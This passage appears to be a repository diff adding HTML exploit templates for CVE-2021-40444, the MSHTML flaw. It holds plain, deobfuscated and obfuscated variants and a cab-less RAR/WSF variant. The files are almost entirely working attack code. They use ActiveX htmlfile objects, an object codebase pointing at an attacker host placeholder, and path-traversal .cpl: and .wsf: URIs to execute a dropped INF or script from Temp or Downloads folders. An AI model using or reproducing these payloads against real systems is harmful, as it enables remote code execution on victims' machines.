// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
function dropIframe() {
var i = document.createElement("iframe");
i.src = ".cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
document.documentElement.appendChild(i);
}
function downloadCAB(){
var obj = document.createElement("object");
obj.setAttribute("codebase", '<HOST_CHANGE_HERE>#version=5,0,0,0');
obj.setAttribute("classid", 'CLSID:edbc374c-5730-432a-b5b8-de94f0b57217');
}
downloadCAB();
setTimeout(function(){ dropIframe(); }, 3000);
</script>
</body>
</html>

0
template/original.html → template/cab-orig-obfuscated.html

69
template/cab-uri-debobfuscated1.html

@ -0,0 +1,69 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
function garbage() {
return 'garbage';
}
(function exploit() {
var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe');
try {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe);
} catch (_0x1ab454) {
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe);
}
var htmlfile = iframe['contentWindow']['ActiveXObject'], htmlfile2 = new htmlfile('htmlfile');
iframe['contentDocument']['open']()['close']();
try {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe);
} catch (_0x3b004e) {
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe);
}
htmlfile2['open']()['close']();
var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile');
htmlfile3['open']()['close']();
var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile');
htmlfile4['open']()['close']();
var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile');
htmlfile5['open']()['close']();
var ActiveXObjectVAR = new ActiveXObject('htmlfile')
, ActiveXObjectVAR2 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR3 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR4 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR5 = new ActiveXObject('htmlfile')
, ActiveXObjectVAR6 = new ActiveXObject('htmlfile')
, XMLHttpR = new window['XMLHttpRequest']()
, XMLHttpRopen = window['XMLHttpRequest']['prototype']['open']
, XMLHttpRsend = window['XMLHttpRequest']['prototype']['send'];
XMLHttpRopen['call'](XMLHttpR, 'GET', '<HOST_CHANGE_HERE>', ![]),
XMLHttpRsend['call'](XMLHttpR),
htmlfile5['Script']['document']['write']('body>');
var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object');
htmlScript['setAttribute']('codebase', '<HOST_CHANGE_HERE>#version=5,0,0,0');
htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'),
window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript),
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>',
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR2['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR3['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR5['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>',
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>';
}());
</script>
</body>
</html>

146
template/cab-uri-debobfuscated2.html

@ -0,0 +1,146 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
<title>CVE-2021-40444</title>
</head>
<body>
<script>
'use strict';
/** @type {!Array} */
var tokensArray = ["123", "365952KMsRQT", "tiveX", "/Lo", "./../../", "contentDocument", "ppD", "Dat", "close", "Acti", "removeChild", "mlF", "write", "./A", "ata/", "ile", "../", "body", "setAttribute", "#version=5,0,0,0", "ssi", "iframe", "748708rfmUTk", "documentElement", "lFile", "location", "159708hBVRtu", "a/Lo", "Script", "document", "call", "contentWindow", "emp", "Document", "Obj", "prototype", "lfi", "bject", "send", "appendChild", "Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "htmlfile", "115924pLbIpw", "GET",
"p/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "1109sMoXXX", "./../A", "htm", "l/T", "cal/", "1wzQpCO", "ect", "w/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "522415dmiRUA", "<HOST_CHANGE_HERE>", "88320wWglcB", "XMLHttpRequest", "<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "Act", "D:edbc374c-5730-432a-b5b8-de94f0b57217", "open", "<bo", "HTMLElement", "/..", "veXO", "102FePAWC"];
/**
* @param {number} totalExpectedResults
* @param {?} entrySelector
* @return {?}
*/
function getValue(totalExpectedResults, entrySelector) {
return getValue = function(state, value) {
/** @type {number} */
state = state - 170;
var processorState = tokensArray[state];
return processorState;
}, getValue(totalExpectedResults, entrySelector);
}
(function(data, oldPassword) {
/** @type {function(number, ?): ?} */
var toMonths = getValue;
for (; !![];) {
try {
/** @type {number} */
var userPsd = parseInt(toMonths(206)) + parseInt(toMonths(216)) * parseInt(toMonths(196)) + parseInt(toMonths(201)) * -parseInt(toMonths(173)) + parseInt(toMonths(177)) + parseInt(toMonths(204)) + -parseInt(toMonths(193)) + parseInt(toMonths(218));
if (userPsd === oldPassword) {
break;
} else {
data["push"](data["shift"]());
}
} catch (_0x34af1e) {
data["push"](data["shift"]());
}
}
})(tokensArray, 384881), function() {
/**
* @return {?}
*/
function token_dash_lineno() {
/** @type {function(number, ?): ?} */
var addedRelations = currentRelations;
return addedRelations(205);
}
/** @type {function(number, ?): ?} */
var currentRelations = getValue;
/** @type {!Window} */
var global = window;
var document = global["document"];
var then = global["Document"]["prototype"]["createElement"];
var writeFunction = global["Document"]["prototype"]["write"];
var PL$22 = global["HTMLElement"]["prototype"]["appendChild"];
var $ = global["HTMLElement"]["prototype"]["removeChild"];
var el = then["call"](document, "iframe");
try {
PL$22["call"](document["body"], el);
} catch (_0x1ab454) {
PL$22["call"](document["documentElement"], el);
}
var ACTIVEX = el["contentWindow"]["ActiveXObject"];
var model = new ACTIVEX("htmlfile");
el["contentDocument"]["open"]()["close"]();
/** @type {string} */
var colname = "p";
try {
$["call"](document["body"], el);
} catch (_0x3b004e) {
$["call"](document["documentElement"], el);
}
model["open"]()["close"]();
var ops = new model["Script"]["Act" + "iveX" + "Obj" + "ect"]("htmlFile");
ops["open"]()["close"]();
/** @type {string} */
var _ = "c";
var TokenType = new ops["Script"]["Ac" + "tiveX" + "Object"]("htmlFile");
TokenType["open"]()["close"]();
var view = new TokenType["Script"]["Acti" + "veXO" + "bject"]("htmlFile");
view["open"]()["close"]();
var iedom = new ActiveXObject("htmlfile");
var rp_test = new ActiveXObject("htmlfile");
var htmlfile = new ActiveXObject("htmlfile");
var fake = new ActiveXObject("htmlfile");
var doc = new ActiveXObject("htmlfile");
var a = new ActiveXObject("htmlfile");
var Object = global["XMLHttpRequest"];
var args = new Object;
var ast = Object["prototype"]["open"];
var callbacks = Object["prototype"]["send"];
var modelIns = global["setTimeout"];
ast["call"](args, "GET", token_dash_lineno(), ![]);
callbacks["call"](args);
view["Script"]["document"]["write"]("<body>");
var s = then["call"](view["Script"]["document"], "object");
s["setAttribute"]("codebase", token_dash_lineno() + "#version=5,0,0,0");
/** @type {string} */
var i = "l";
s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](view["Script"]["document"]["body"], s);
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
rp_test["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
htmlfile["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
doc["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
}();
</script>
</body>
</html>

3
template/cab-uri-obfuscated.html

File diff suppressed because one or more lines are too long

75
template/cab-uri-sample1.html

@ -0,0 +1,75 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
<title>CVE-2021-40444</title>
</head>
<body>
<script>
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
var obj = document.createElement("object");
obj.setAttribute("codebase", '<HOST_CHANGE_HERE>#version=5,0,0,0');
obj.setAttribute("classid", 'CLSID:edbc374c-5730-432a-b5b8-de94f0b57217');
var i = document.createElement("iframe");
document.documentElement.appendChild(i);
i.src = ".cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
i = document.createElement("iframe");
document.documentElement.appendChild(i);
i.src = "<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
</script>
</body>
</html>

13
template/cab-uri-test-obfuscated.html

File diff suppressed because one or more lines are too long

68
template/cabless-rar-sample1.html

@ -0,0 +1,68 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2021-40444 (Cab-less)</title>
</head>
<body>
<!--Cab-less exploitation by Edu_Braun_0day-->
<script>
new ActiveXObject('htmlfile').Script.location = '.wsf:../../../Downloads/<RAR_CHANGE_HERE>?.wsf';
var i = document.createElement("iframe");
document.documentElement.appendChild(i);
i.src = '.wsf:../../../Downloads/<RAR_CHANGE_HERE>?.wsf';
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
